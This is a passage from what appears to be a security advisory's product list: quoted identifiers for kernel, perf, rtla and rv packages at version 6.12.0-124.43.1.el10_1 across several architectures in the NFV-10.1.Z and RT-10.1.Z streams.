"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
